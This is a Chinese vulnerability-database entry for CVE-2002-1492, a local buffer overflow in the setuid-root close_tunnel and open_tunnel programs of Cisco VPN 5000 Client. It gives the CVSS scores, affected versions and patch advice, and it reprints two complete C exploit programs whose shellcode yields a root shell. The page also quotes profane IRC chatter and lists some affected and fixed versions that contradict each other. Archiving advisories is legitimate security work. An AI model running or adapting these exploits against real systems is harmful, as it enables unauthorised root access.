CVE-2002-1492
CVSS7.2
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-05 16:30:44
NMCOES    

[原文]Buffer overflows in the Cisco VPN 5000 Client before 5.2.7 for Linux, and VPN 5000 Client before 5.2.8 for Solaris, allow local users to gain root privileges via (1) close_tunnel and (2) open_tunnel.


[CNNVD]Cisco VPN客户端本地缓冲区溢出漏洞(CNNVD-200304-004)

        
        Cisco Virtual Private Network (VPN)客户端程序用于与企业CISCO VPN设备通过Internet安全通信的程序。使用在Microsoft Windows操作系统下,也可以使用在Linux操作系统下。
        Cisco VPN 5000客户端'close_tunnel'和'open_tunnel'程序存在缓冲区溢出,本地攻击者利用这个漏洞可能以root用户权限在系统上执行任意指令。
        Cisco VPN客户端包含'close_tunnel'和'open_tunnel'程序,默认以suid root属性安装,恶意本地用户可以利用这些漏洞提升到root用户权限。
        CISCO指定这个漏洞号为:CSCdy20065
        <*链接:http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml
        *>

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cisco:vpn_5000_client:5.2.6::linux
cpe:/a:cisco:vpn_5000_client:5.2.7::solaris

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1492
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1492
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-004
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5734
(VENDOR_ADVISORY)  BID  5734
http://www.iss.net/security_center/static/10131.php
(VENDOR_ADVISORY)  XF  cisco-vpn5000-binary-bo(10131)
http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml
(VENDOR_ADVISORY)  CISCO  20020918 Cisco VPN 5000 Client Multiple Vulnerabilities

- 漏洞信息

Cisco VPN客户端本地缓冲区溢出漏洞
高危 边界条件错误
2003-04-02 00:00:00 2005-10-20 00:00:00
本地  
        
        Cisco Virtual Private Network (VPN)客户端程序用于与企业CISCO VPN设备通过Internet安全通信的程序。使用在Microsoft Windows操作系统下,也可以使用在Linux操作系统下。
        Cisco VPN 5000客户端'close_tunnel'和'open_tunnel'程序存在缓冲区溢出,本地攻击者利用这个漏洞可能以root用户权限在系统上执行任意指令。
        Cisco VPN客户端包含'close_tunnel'和'open_tunnel'程序,默认以suid root属性安装,恶意本地用户可以利用这些漏洞提升到root用户权限。
        CISCO指定这个漏洞号为:CSCdy20065
        <*链接:http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml
        *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时去掉'close_tunnel'和'open_tunnel'程序的SETUID ROOT属性。
        厂商补丁:
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(Cisco-vpn5k-client)以及相应补丁:
        Cisco-vpn5k-client:Cisco VPN 5000 Client Multiple Vulnerabilities
        链接:
        http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtml

        Cisco VPN 5000 client release 5.2.4(及此后版本)和Solaris VPN 5000 Client release 5.2.8(及此后版本)中已修复了这一漏洞。
        关于升级到已修复程序的方法,详情请见:
        
        http://www.cisco.com/univercd/cc/td/doc/product/aggr/vpn5000/client/

        签约用户可从正常更新渠道获取升级软件。对大多数用户来说,可通过Cisco网站软件中心获取升级软件:
        
        http://www.cisco.com/public/sw-center/

        事先或目前与第三方支持组织,如Cisco合作伙伴、授权零售商或服务商之间已有协议,由第三方组织提供Cisco产品或技术支持的用户可免费获得升级支持。
        直接从Cisco购买产品但没有Cisco服务合同的用户和由第三方厂商购买产品但无法从销售方获得已修复软件的用户可从Cisco技术支持中心(TAC)获取升级软件。TAC联系方法:
         * +1 800 553 2447 (北美地区免话费)
         * +1 408 526 7209 (全球收费)
         * e-mail: tac@cisco.com

- 漏洞信息 (21805)

Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (1) (EDBID:21805)
unix local
2002-09-18 Verified
0 BrainStorm
N/A [点击下载]
source: http://www.securityfocus.com/bid/5734/info

Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.

/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax            0xffffffff       -1
* ecx            0x0      0
* edx            0x0      0
* ebx            0x4015c154       1075167572
* esp            0xbfffdb70       0xbfffdb70
* ebp            0x41414141       0x41414141
* esi            0x400168e4       1073834212
* edi            0xbfffdbf4       -1073751052
* eip            0x41414141       0x41414141
* eflags         0x10286  66182
*
* as you can see %eip got filled with 0x41 ;)
*
* tested:
*         - on release 5.1.5
*         - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
*         - system RedHat Linux 7.2 / x86
*
* Bug Information:
*  There are multiple unchecked buffers in the code which allow
*  arbitrary code to be executed with root privileges.
*  this is due to insufficient bounds checking.
*  the result is a classic command line buffer overflow condition.
*  This should be exploitable on Linux/Solaris.
*
* IRC:
*  <BrainStor> a standard cmd line buffer overflow in the -d option
*  <BrainStor> close_tunnel is set +s by default
*  <v0id> tsk tsk tsk, cisco making errors like that
*  <v0id> fucking stupid cunts
*  <BrainStor> yea
*  <BrainStor> its ubeliveable
*  <v0id> man, standard buffer overflow should be practiclly non existant 
these days
*  <v0id> oh well
*  <BrainStor> indeed
*  <BrainStor> but its good tho ;)
*/

#include <stdio.h>
#include <unistd.h>

#define B       2504
#define N       0x90
#define R       0xbfffefc0                                                // 
may needs to be changed deppending on the distro/os..
#define BIN     "/bin/close_tunnel"                                       // 
you maybe want to change this too =P
                                                                          // 
/usr/local/bin/close_tunnel or so..
char shell[] = "HELO"                                                     // 
yes this is a valid x86 instruction ;)
               "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"                         // 
setuid();
               "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
               "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
               "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";


int main(int argc, char **argv[])
{
  int ret, off, es;

  char bof[B];

    printf("\n\n");
    printf("       [ElectronicSouls]       \n");
    printf(" Cisco VPN 5000 client exploit \n");
    printf("        (C) BrainStorm       \n\n");

    if(argv[1] == NULL) {
       off = 0;
       ret = R; }

    else {
       off = atoi(argv[1]);
       ret = atoi(argv[2])+off; }

    for (es = 0; es < B; es += 4 )
       *(long *) &bof[es] = ret;

    printf("+ return address: 0x%lx \n",ret);

    for (es = 0; es < (B - strlen(shell) - 36); ++es)
       *(bof+es) = N;

    memcpy(bof+es, shell, strlen(shell));

    printf("+ overflowing the buffer..\n\n\n");

    execl(BIN,BIN,"-d",bof,0);       // b00m!

  return(0);
}

		

- 漏洞信息 (21806)

Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (2) (EDBID:21806)
unix local
2002-09-18 Verified
0 zillion
N/A [点击下载]
source: http://www.securityfocus.com/bid/5734/info
 
Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.

/*
 * Cisco VPN 5000 Linux client version 5.1.5 local root exploit 
 *
 * By zillion[at]safemode.org 09/2002 
 * 
 * Greets to the 0dd people ;p
 *
 */

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 2504
#define NOP 0x90
#define RET 0xbffff0e0

char shellcode[]=

        /* setresuid(0,0,0) &&  execve("/bin/sh",["/bin/sh"],0); */
        "\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80"
        "\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";

void print_error(char * burb) { 
        printf(" Error: %s !\n",burb); exit(0); 
}

void usage(char *progname) {
        printf("\nDefault: %s  -f /path/to/close_tunnel",progname);
        printf("\nOption : %s  -o <offset>\n\n",progname);
        exit(0);
}

int main(int argc, char **argv){

char buffer[BUFFER_SIZE];
char file[30];
long retaddress;
int arg,offset=600;

struct stat sbuf;

if(argc < 2) { usage(argv[0]); }

while ((arg = getopt (argc, argv, "f:o:")) != -1){ 
      switch (arg){ 
      case 'f': 
        strncpy(file,optarg,sizeof(file));
        if(stat(argv[2], &sbuf)) { print_error("No such file");}
        break; 
      case 'o':       
        offset = atoi(optarg);
        if(offset < 0) { print_error("Offset must be positive");}
        break; 
      default :       
        usage(argv[0]); 
     } 
} 

retaddress = (RET - offset);
memset(buffer,NOP,BUFFER_SIZE);
memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);

/* Overwrite EBP and EIP */
*(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
*(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;

if(execl(file,file,"-d",buffer,NULL) != 0) {
        print_error("Could not execute file");
}

return 0;

}


		

- 漏洞信息

8878
Cisco VPN 5000 Client Multiple Function Overflows
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-09-18 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cisco VPN 5000 Client Buffer Overrun Vulnerabilities
Boundary Condition Error 5734
No Yes
2002-09-18 12:00:00 2009-07-11 05:06:00
Discovered by Niels Heinen <niels.heinen@ubizen.com>.

- 受影响的程序版本

Cisco VPN 5000 Client for Solaris 5.2.7
Cisco VPN 5000 Client for Linux 5.2.6
Cisco VPN 5000 Client for Solaris 5.2.8
Cisco VPN 5000 Client for Linux 5.2.7

- 不受影响的程序版本

Cisco VPN 5000 Client for Solaris 5.2.8
Cisco VPN 5000 Client for Linux 5.2.7

- 漏洞讨论

Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.

- 漏洞利用

Exploit code has been published for version 5.1.5 on Linux systems:

- 解决方案

Cisco has released patched upgrades:


Cisco VPN 5000 Client for Linux 5.2.6
  • Cisco VPN 5000 Client for Linux 5.2.7


Cisco VPN 5000 Client for Solaris 5.2.7
  • Cisco VPN 5000 Client for Solaris 5.2.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站